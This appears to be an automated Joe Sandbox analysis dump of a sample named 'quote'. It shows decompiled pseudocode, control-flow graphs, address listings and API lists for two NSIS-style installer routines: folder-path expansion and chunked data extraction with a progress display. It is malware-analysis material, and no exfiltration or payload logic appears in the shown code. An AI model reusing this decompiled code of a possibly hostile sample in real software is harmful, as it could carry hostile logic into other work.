                                                                                      control_flow_graph 435 40644e-406459 436 40645b-40646a 435->436 437 40646c-406482 435->437 436->437 438 406488-406495 437->438 439 40669a-4066a0 437->439 438->439 440 40649b-4064a2 438->440 441 4066a6-4066b1 439->441 442 4064a7-4064b4 439->442 440->439 443 4066b3-4066b7 call 406411 441->443 444 4066bc-4066bd 441->444 442->441 445 4064ba-4064c6 442->445 443->444 447 406687 445->447 448 4064cc-40650a 445->448 451 406695-406698 447->451 452 406689-406693 447->452 449 406510-40651b 448->449 450 40662a-40662e 448->450 453 406534 449->453 454 40651d-406522 449->454 455 406630-406636 450->455 456 406661-406665 450->456 451->439 452->439 459 40653b-406542 453->459 454->453 462 406524-406527 454->462 457 406646-406652 call 406411 455->457 458 406638-406644 call 406358 455->458 460 406674-406685 lstrlenW 456->460 461 406667-40666f call 40644e 456->461 472 406657-40665d 457->472 458->472 464 406544-406546 459->464 465 406547-406549 459->465 460->439 461->460 462->453 468 406529-40652c 462->468 464->465 470 406584-406587 465->470 471 40654b-406572 call 4062df 465->471 468->453 473 40652e-406532 468->473 476 406597-40659a 470->476 477 406589-406595 GetSystemDirectoryW 470->477 483 406612-406615 471->483 484 406578-40657f call 40644e 471->484 472->460 475 40665f 472->475 473->459 479 406622-406628 call 4066c0 475->479 481 406605-406607 476->481 482 40659c-4065aa GetWindowsDirectoryW 476->482 480 406609-40660d 477->480 479->460 480->479 486 40660f 480->486 481->480 485 4065ac-4065b6 481->485 482->481 483->479 489 406617-40661d lstrcatW 483->489 484->480 491 4065d0-4065e6 SHGetSpecialFolderLocation 485->491 492 4065b8-4065bb 485->492 486->483 489->479 494 406601 491->494 495 4065e8-4065ff SHGetPathFromIDListW CoTaskMemFree 491->495 492->491 493 4065bd-4065c4 492->493 497 4065cc-4065ce 493->497 494->481 495->480 495->494 497->480 497->491
                                                                                      C-Code - Quality: 72%
                                                                                      			E0040644E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				struct _ITEMIDLIST* _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _t43;
                                                                                      				WCHAR* _t44;
                                                                                      				signed char _t46;
                                                                                      				signed int _t47;
                                                                                      				signed int _t48;
                                                                                      				short _t58;
                                                                                      				short _t60;
                                                                                      				short _t62;
                                                                                      				void* _t70;
                                                                                      				signed int _t76;
                                                                                      				void* _t82;
                                                                                      				signed char _t83;
                                                                                      				short _t86;
                                                                                      				intOrPtr _t94;
                                                                                      				signed int _t96;
                                                                                      				void* _t102;
                                                                                      				short _t103;
                                                                                      				signed int _t106;
                                                                                      				signed int _t108;
                                                                                      				void* _t109;
                                                                                      				WCHAR* _t110;
                                                                                      				void* _t112;
                                                                                      
                                                                                      				_t109 = __esi;
                                                                                      				_t102 = __edi;
                                                                                      				_t70 = __ebx;
                                                                                      				_t43 = _a8;
                                                                                      				if(_t43 < 0) {
                                                                                      					_t94 =  *0x433edc; // 0x6c266a
                                                                                      					_t43 =  *(_t94 - 4 + _t43 * 4);
                                                                                      				}
                                                                                      				_push(_t70);
                                                                                      				_push(_t109);
                                                                                      				_push(_t102);
                                                                                      				_t96 =  *0x434f58 + _t43 * 2;
                                                                                      				_t44 = 0x432ea0;
                                                                                      				_t110 = 0x432ea0;
                                                                                      				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                      					_t110 = _a4;
                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t103 =  *_t96;
                                                                                      					if(_t103 == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                                      					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t82 = 2;
                                                                                      					_t96 = _t96 + _t82;
                                                                                      					__eflags = _t103 - 4;
                                                                                      					_a8 = _t96;
                                                                                      					if(__eflags >= 0) {
                                                                                      						if(__eflags != 0) {
                                                                                      							 *_t110 = _t103;
                                                                                      							_t110 = _t110 + _t82;
                                                                                      							__eflags = _t110;
                                                                                      						} else {
                                                                                      							 *_t110 =  *_t96;
                                                                                      							_t110 = _t110 + _t82;
                                                                                      							_t96 = _t96 + _t82;
                                                                                      						}
                                                                                      						continue;
                                                                                      					}
                                                                                      					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                                      					_t46 =  *_t96;
                                                                                      					_t47 = _t46 & 0x000000ff;
                                                                                      					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                                      					_a8 = _a8 + 2;
                                                                                      					_v28 = _t47 | 0x00008000;
                                                                                      					_v24 = _t47;
                                                                                      					_t76 = _t83 & 0x000000ff;
                                                                                      					_v16 = _t76;
                                                                                      					__eflags = _t103 - 2;
                                                                                      					_v20 = _t76 | 0x00008000;
                                                                                      					if(_t103 != 2) {
                                                                                      						__eflags = _t103 - 3;
                                                                                      						if(_t103 != 3) {
                                                                                      							__eflags = _t103 - 1;
                                                                                      							if(_t103 == 1) {
                                                                                      								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                                      								E0040644E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                                      							}
                                                                                      							L43:
                                                                                      							_t48 = lstrlenW(_t110);
                                                                                      							_t96 = _a8;
                                                                                      							_t110 =  &(_t110[_t48]);
                                                                                      							_t44 = 0x432ea0;
                                                                                      							continue;
                                                                                      						}
                                                                                      						_t106 = _v8;
                                                                                      						__eflags = _t106 - 0x1d;
                                                                                      						if(_t106 != 0x1d) {
                                                                                      							__eflags = (_t106 << 0xb) + 0x436000;
                                                                                      							E00406411(_t110, (_t106 << 0xb) + 0x436000);
                                                                                      						} else {
                                                                                      							E00406358(_t110,  *0x434f08);
                                                                                      						}
                                                                                      						__eflags = _t106 + 0xffffffeb - 7;
                                                                                      						if(_t106 + 0xffffffeb < 7) {
                                                                                      							L34:
                                                                                      							E004066C0(_t110);
                                                                                      						}
                                                                                      						goto L43;
                                                                                      					}
                                                                                      					_t86 =  *0x434f0c;
                                                                                      					__eflags = _t86;
                                                                                      					_t108 = 2;
                                                                                      					if(_t86 >= 0) {
                                                                                      						L13:
                                                                                      						_v8 = 1;
                                                                                      						L14:
                                                                                      						__eflags =  *0x434fa4;
                                                                                      						if( *0x434fa4 != 0) {
                                                                                      							_t108 = 4;
                                                                                      						}
                                                                                      						__eflags = _t47;
                                                                                      						if(__eflags >= 0) {
                                                                                      							__eflags = _t47 - 0x25;
                                                                                      							if(_t47 != 0x25) {
                                                                                      								__eflags = _t47 - 0x24;
                                                                                      								if(_t47 == 0x24) {
                                                                                      									GetWindowsDirectoryW(_t110, 0x400);
                                                                                      									_t108 = 0;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									__eflags = _t108;
                                                                                      									if(_t108 == 0) {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      									_t58 =  *0x434f04;
                                                                                      									_t108 = _t108 - 1;
                                                                                      									__eflags = _t58;
                                                                                      									if(_t58 == 0) {
                                                                                      										L26:
                                                                                      										_t60 = SHGetSpecialFolderLocation( *0x434f08,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                                      										__eflags = _t60;
                                                                                      										if(_t60 != 0) {
                                                                                      											L28:
                                                                                      											 *_t110 =  *_t110 & 0x00000000;
                                                                                      											__eflags =  *_t110;
                                                                                      											continue;
                                                                                      										}
                                                                                      										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                                      										__imp__CoTaskMemFree(_v12);
                                                                                      										__eflags = _t60;
                                                                                      										if(_t60 != 0) {
                                                                                      											goto L30;
                                                                                      										}
                                                                                      										goto L28;
                                                                                      									}
                                                                                      									__eflags = _v8;
                                                                                      									if(_v8 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									_t62 =  *_t58( *0x434f08,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                                      									__eflags = _t62;
                                                                                      									if(_t62 == 0) {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							GetSystemDirectoryW(_t110, 0x400);
                                                                                      							goto L30;
                                                                                      						} else {
                                                                                      							E004062DF( *0x434f58, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f58 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
                                                                                      							__eflags =  *_t110;
                                                                                      							if( *_t110 != 0) {
                                                                                      								L32:
                                                                                      								__eflags = _t76 - 0x1a;
                                                                                      								if(_t76 == 0x1a) {
                                                                                      									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                      								}
                                                                                      								goto L34;
                                                                                      							}
                                                                                      							E0040644E(_t76, _t108, _t110, _t110, _t76);
                                                                                      							L30:
                                                                                      							__eflags =  *_t110;
                                                                                      							if( *_t110 == 0) {
                                                                                      								goto L34;
                                                                                      							}
                                                                                      							_t76 = _v16;
                                                                                      							goto L32;
                                                                                      						}
                                                                                      					}
                                                                                      					__eflags = _t86 - 0x5a04;
                                                                                      					if(_t86 == 0x5a04) {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					__eflags = _t76 - 0x23;
                                                                                      					if(_t76 == 0x23) {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					__eflags = _t76 - 0x2e;
                                                                                      					if(_t76 == 0x2e) {
                                                                                      						goto L13;
                                                                                      					} else {
                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				 *_t110 =  *_t110 & 0x00000000;
                                                                                      				if(_a4 == 0) {
                                                                                      					return _t44;
                                                                                      				}
                                                                                      				return E00406411(_a4, _t44);
                                                                                      			}































                                                                                      0x0040644e
                                                                                      0x0040644e
                                                                                      0x0040644e
                                                                                      0x00406454
                                                                                      0x00406459
                                                                                      0x0040645b
                                                                                      0x0040646a
                                                                                      0x0040646a
                                                                                      0x00406472
                                                                                      0x00406473
                                                                                      0x00406474
                                                                                      0x00406475
                                                                                      0x00406478
                                                                                      0x00406480
                                                                                      0x00406482
                                                                                      0x0040649b
                                                                                      0x0040649e
                                                                                      0x0040649e
                                                                                      0x0040669a
                                                                                      0x0040669a
                                                                                      0x004066a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004064ae
                                                                                      0x004064b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004064bc
                                                                                      0x004064bd
                                                                                      0x004064bf
                                                                                      0x004064c3
                                                                                      0x004064c6
                                                                                      0x00406687
                                                                                      0x00406695
                                                                                      0x00406698
                                                                                      0x00406698
                                                                                      0x00406689
                                                                                      0x0040668c
                                                                                      0x0040668f
                                                                                      0x00406691
                                                                                      0x00406691
                                                                                      0x00000000
                                                                                      0x00406687
                                                                                      0x004064cc
                                                                                      0x004064cf
                                                                                      0x004064de
                                                                                      0x004064e5
                                                                                      0x004064ef
                                                                                      0x004064f3
                                                                                      0x004064f6
                                                                                      0x004064f9
                                                                                      0x004064fe
                                                                                      0x00406503
                                                                                      0x00406507
                                                                                      0x0040650a
                                                                                      0x0040662a
                                                                                      0x0040662e
                                                                                      0x00406661
                                                                                      0x00406665
                                                                                      0x0040666a
                                                                                      0x0040666f
                                                                                      0x0040666f
                                                                                      0x00406674
                                                                                      0x00406675
                                                                                      0x0040667a
                                                                                      0x0040667d
                                                                                      0x00406680
                                                                                      0x00000000
                                                                                      0x00406680
                                                                                      0x00406630
                                                                                      0x00406633
                                                                                      0x00406636
                                                                                      0x0040664b
                                                                                      0x00406652
                                                                                      0x00406638
                                                                                      0x0040663f
                                                                                      0x0040663f
                                                                                      0x0040665a
                                                                                      0x0040665d
                                                                                      0x00406622
                                                                                      0x00406623
                                                                                      0x00406623
                                                                                      0x00000000
                                                                                      0x0040665d
                                                                                      0x00406510
                                                                                      0x00406518
                                                                                      0x0040651a
                                                                                      0x0040651b
                                                                                      0x00406534
                                                                                      0x00406534
                                                                                      0x0040653b
                                                                                      0x0040653b
                                                                                      0x00406542
                                                                                      0x00406546
                                                                                      0x00406546
                                                                                      0x00406547
                                                                                      0x00406549
                                                                                      0x00406584
                                                                                      0x00406587
                                                                                      0x00406597
                                                                                      0x0040659a
                                                                                      0x004065a2
                                                                                      0x004065a8
                                                                                      0x004065a8
                                                                                      0x00406605
                                                                                      0x00406605
                                                                                      0x00406607
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065ac
                                                                                      0x004065b3
                                                                                      0x004065b4
                                                                                      0x004065b6
                                                                                      0x004065d0
                                                                                      0x004065de
                                                                                      0x004065e4
                                                                                      0x004065e6
                                                                                      0x00406601
                                                                                      0x00406601
                                                                                      0x00406601
                                                                                      0x00000000
                                                                                      0x00406601
                                                                                      0x004065ec
                                                                                      0x004065f7
                                                                                      0x004065fd
                                                                                      0x004065ff
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065ff
                                                                                      0x004065b8
                                                                                      0x004065bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065ca
                                                                                      0x004065cc
                                                                                      0x004065ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065ce
                                                                                      0x00000000
                                                                                      0x00406605
                                                                                      0x0040658f
                                                                                      0x00000000
                                                                                      0x0040654b
                                                                                      0x00406569
                                                                                      0x0040656e
                                                                                      0x00406572
                                                                                      0x00406612
                                                                                      0x00406612
                                                                                      0x00406615
                                                                                      0x0040661d
                                                                                      0x0040661d
                                                                                      0x00000000
                                                                                      0x00406615
                                                                                      0x0040657a
                                                                                      0x00406609
                                                                                      0x00406609
                                                                                      0x0040660d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040660f
                                                                                      0x00000000
                                                                                      0x0040660f
                                                                                      0x00406549
                                                                                      0x0040651d
                                                                                      0x00406522
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406524
                                                                                      0x00406527
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406529
                                                                                      0x0040652c
                                                                                      0x00000000
                                                                                      0x0040652e
                                                                                      0x0040652e
                                                                                      0x00000000
                                                                                      0x0040652e
                                                                                      0x0040652c
                                                                                      0x004066a6
                                                                                      0x004066b1
                                                                                      0x004066bd
                                                                                      0x004066bd
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040658F
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000), ref: 004065A2
                                                                                      • SHGetSpecialFolderLocation.SHELL32(004054B0,00425A20,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000), ref: 004065DE
                                                                                      • SHGetPathFromIDListW.SHELL32(00425A20,Call), ref: 004065EC
                                                                                      • CoTaskMemFree.OLE32(00425A20), ref: 004065F7
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000), ref: 00406675
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$j&l
                                                                                      • API String ID: 717251189-3593723137
                                                                                      • Opcode ID: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
                                                                                      • Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
                                                                                      • Opcode Fuzzy Hash: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
                                                                                      • Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 562 40324c-403263 563 403265 562->563 564 40326c-403275 562->564 563->564 565 403277 564->565 566 40327e-403283 564->566 565->566 567 403293-4032a0 call 403467 566->567 568 403285-40328e call 40347d 566->568 572 403455 567->572 573 4032a6-4032aa 567->573 568->567 574 403457-403458 572->574 575 403400-403402 573->575 576 4032b0-4032f9 GetTickCount 573->576 579 403460-403464 574->579 577 403442-403445 575->577 578 403404-403407 575->578 580 40345d 576->580 581 4032ff-403307 576->581 582 403447 577->582 583 40344a-403453 call 403467 577->583 578->580 584 403409 578->584 580->579 585 403309 581->585 586 40330c-40331a call 403467 581->586 582->583 583->572 595 40345a 583->595 589 40340c-403412 584->589 585->586 586->572 594 403320-403329 586->594 592 403414 589->592 593 403416-403424 call 403467 589->593 592->593 593->572 599 403426-403432 call 405fb9 593->599 598 40332f-40334f call 406961 594->598 595->580 604 403355-403368 GetTickCount 598->604 605 4033f8-4033fa 598->605 606 403434-40343e 599->606 607 4033fc-4033fe 599->607 608 4033b3-4033b5 604->608 609 40336a-403372 604->609 605->574 606->589 610 403440 606->610 607->574 613 4033b7-4033bb 608->613 614 4033ec-4033f0 608->614 611 403374-403378 609->611 612 40337a-4033ab MulDiv wsprintfW call 405479 609->612 610->580 611->608 611->612 620 4033b0 612->620 617 4033d2-4033dd 613->617 618 4033bd-4033c4 call 405fb9 613->618 614->581 615 4033f6 614->615 615->580 619 4033e0-4033e4 617->619 622 4033c9-4033cb 618->622 619->598 623 4033ea 619->623 620->608 622->607 624 4033cd-4033d0 622->624 623->580 624->619
                                                                                      C-Code - Quality: 95%
                                                                                      			E0040324C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                      				signed int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				short _v152;
                                                                                      				void* _t65;
                                                                                      				long _t70;
                                                                                      				intOrPtr _t75;
                                                                                      				long _t76;
                                                                                      				intOrPtr _t77;
                                                                                      				void* _t78;
                                                                                      				int _t88;
                                                                                      				intOrPtr _t92;
                                                                                      				intOrPtr _t95;
                                                                                      				long _t96;
                                                                                      				signed int _t97;
                                                                                      				int _t98;
                                                                                      				int _t99;
                                                                                      				intOrPtr _t100;
                                                                                      				void* _t101;
                                                                                      				void* _t102;
                                                                                      
                                                                                      				_t97 = _a16;
                                                                                      				_t92 = _a12;
                                                                                      				_v12 = _t97;
                                                                                      				if(_t92 == 0) {
                                                                                      					_v12 = 0x8000;
                                                                                      				}
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_v16 = _t92;
                                                                                      				if(_t92 == 0) {
                                                                                      					_v16 = 0x422a20;
                                                                                      				}
                                                                                      				_t62 = _a4;
                                                                                      				if(_a4 >= 0) {
                                                                                      					E0040347D( *0x434f78 + _t62);
                                                                                      				}
                                                                                      				if(E00403467( &_a16, 4) == 0) {
                                                                                      					L41:
                                                                                      					_push(0xfffffffd);
                                                                                      					goto L42;
                                                                                      				} else {
                                                                                      					if((_a19 & 0x00000080) == 0) {
                                                                                      						if(_t92 != 0) {
                                                                                      							if(_a16 < _t97) {
                                                                                      								_t97 = _a16;
                                                                                      							}
                                                                                      							if(E00403467(_t92, _t97) != 0) {
                                                                                      								_v8 = _t97;
                                                                                      								L44:
                                                                                      								return _v8;
                                                                                      							} else {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a16 <= _t92) {
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_t88 = _v12;
                                                                                      						while(1) {
                                                                                      							_t98 = _a16;
                                                                                      							if(_a16 >= _t88) {
                                                                                      								_t98 = _t88;
                                                                                      							}
                                                                                      							if(E00403467(0x41ea20, _t98) == 0) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							if(E00405FB9(_a8, 0x41ea20, _t98) == 0) {
                                                                                      								L28:
                                                                                      								_push(0xfffffffe);
                                                                                      								L42:
                                                                                      								_pop(_t65);
                                                                                      								return _t65;
                                                                                      							}
                                                                                      							_v8 = _v8 + _t98;
                                                                                      							_a16 = _a16 - _t98;
                                                                                      							if(_a16 > 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						goto L41;
                                                                                      					}
                                                                                      					_t70 = GetTickCount();
                                                                                      					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                      					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                      					_t14 =  &_a16;
                                                                                      					 *_t14 = _a16 & 0x7fffffff;
                                                                                      					_v20 = _t70;
                                                                                      					 *0x40ce68 = 8;
                                                                                      					 *0x416a10 = 0x40ea08;
                                                                                      					 *0x416a0c = 0x40ea08;
                                                                                      					 *0x416a08 = 0x416a08;
                                                                                      					_a4 = _a16;
                                                                                      					if( *_t14 <= 0) {
                                                                                      						goto L44;
                                                                                      					} else {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					while(1) {
                                                                                      						L9:
                                                                                      						_t99 = 0x4000;
                                                                                      						if(_a16 < 0x4000) {
                                                                                      							_t99 = _a16;
                                                                                      						}
                                                                                      						if(E00403467(0x41ea20, _t99) == 0) {
                                                                                      							goto L41;
                                                                                      						}
                                                                                      						_a16 = _a16 - _t99;
                                                                                      						 *0x40ce58 = 0x41ea20;
                                                                                      						 *0x40ce5c = _t99;
                                                                                      						while(1) {
                                                                                      							_t95 = _v16;
                                                                                      							 *0x40ce60 = _t95;
                                                                                      							 *0x40ce64 = _v12;
                                                                                      							_t75 = E00406961(0x40ce58);
                                                                                      							_v24 = _t75;
                                                                                      							if(_t75 < 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t100 =  *0x40ce60; // 0x425a20
                                                                                      							_t101 = _t100 - _t95;
                                                                                      							_t76 = GetTickCount();
                                                                                      							_t96 = _t76;
                                                                                      							if(( *0x434fd4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                      								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                      								_t102 = _t102 + 0xc;
                                                                                      								E00405479(0,  &_v152); // executed
                                                                                      								_v20 = _t96;
                                                                                      							}
                                                                                      							if(_t101 == 0) {
                                                                                      								if(_a16 > 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      								goto L44;
                                                                                      							} else {
                                                                                      								if(_a12 != 0) {
                                                                                      									_t77 =  *0x40ce60; // 0x425a20
                                                                                      									_v8 = _v8 + _t101;
                                                                                      									_v12 = _v12 - _t101;
                                                                                      									_v16 = _t77;
                                                                                      									L23:
                                                                                      									if(_v24 != 1) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t78 = E00405FB9(_a8, _v16, _t101); // executed
                                                                                      								if(_t78 == 0) {
                                                                                      									goto L28;
                                                                                      								}
                                                                                      								_v8 = _v8 + _t101;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      						}
                                                                                      						_push(0xfffffffc);
                                                                                      						goto L42;
                                                                                      					}
                                                                                      					goto L41;
                                                                                      				}
                                                                                      			}

























                                                                                      0x00403257
                                                                                      0x0040325b
                                                                                      0x0040325e
                                                                                      0x00403263
                                                                                      0x00403265
                                                                                      0x00403265
                                                                                      0x0040326c
                                                                                      0x00403270
                                                                                      0x00403275
                                                                                      0x00403277
                                                                                      0x00403277
                                                                                      0x0040327e
                                                                                      0x00403283
                                                                                      0x0040328e
                                                                                      0x0040328e
                                                                                      0x004032a0
                                                                                      0x00403455
                                                                                      0x00403455
                                                                                      0x00000000
                                                                                      0x004032a6
                                                                                      0x004032aa
                                                                                      0x00403402
                                                                                      0x00403445
                                                                                      0x00403447
                                                                                      0x00403447
                                                                                      0x00403453
                                                                                      0x0040345a
                                                                                      0x0040345d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403453
                                                                                      0x00403407
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403409
                                                                                      0x0040340c
                                                                                      0x0040340f
                                                                                      0x00403412
                                                                                      0x00403414
                                                                                      0x00403414
                                                                                      0x00403424
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403432
                                                                                      0x004033fc
                                                                                      0x004033fc
                                                                                      0x00403457
                                                                                      0x00403457
                                                                                      0x00000000
                                                                                      0x00403457
                                                                                      0x00403434
                                                                                      0x00403437
                                                                                      0x0040343e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403440
                                                                                      0x00000000
                                                                                      0x0040340c
                                                                                      0x004032b6
                                                                                      0x004032b8
                                                                                      0x004032bf
                                                                                      0x004032c6
                                                                                      0x004032c6
                                                                                      0x004032cd
                                                                                      0x004032d5
                                                                                      0x004032df
                                                                                      0x004032e4
                                                                                      0x004032ec
                                                                                      0x004032f6
                                                                                      0x004032f9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004032ff
                                                                                      0x004032ff
                                                                                      0x004032ff
                                                                                      0x00403307
                                                                                      0x00403309
                                                                                      0x00403309
                                                                                      0x0040331a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403320
                                                                                      0x00403323
                                                                                      0x00403329
                                                                                      0x0040332f
                                                                                      0x0040332f
                                                                                      0x0040333a
                                                                                      0x00403340
                                                                                      0x00403345
                                                                                      0x0040334c
                                                                                      0x0040334f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403355
                                                                                      0x0040335b
                                                                                      0x0040335d
                                                                                      0x00403366
                                                                                      0x00403368
                                                                                      0x00403399
                                                                                      0x0040339f
                                                                                      0x004033ab
                                                                                      0x004033b0
                                                                                      0x004033b0
                                                                                      0x004033b5
                                                                                      0x004033f0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033b7
                                                                                      0x004033bb
                                                                                      0x004033d2
                                                                                      0x004033d7
                                                                                      0x004033da
                                                                                      0x004033dd
                                                                                      0x004033e0
                                                                                      0x004033e4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033ea
                                                                                      0x004033c4
                                                                                      0x004033cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033cd
                                                                                      0x00000000
                                                                                      0x004033cd
                                                                                      0x004033b5
                                                                                      0x004033f8
                                                                                      0x00000000
                                                                                      0x004033f8
                                                                                      0x00000000
                                                                                      0x004032ff

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
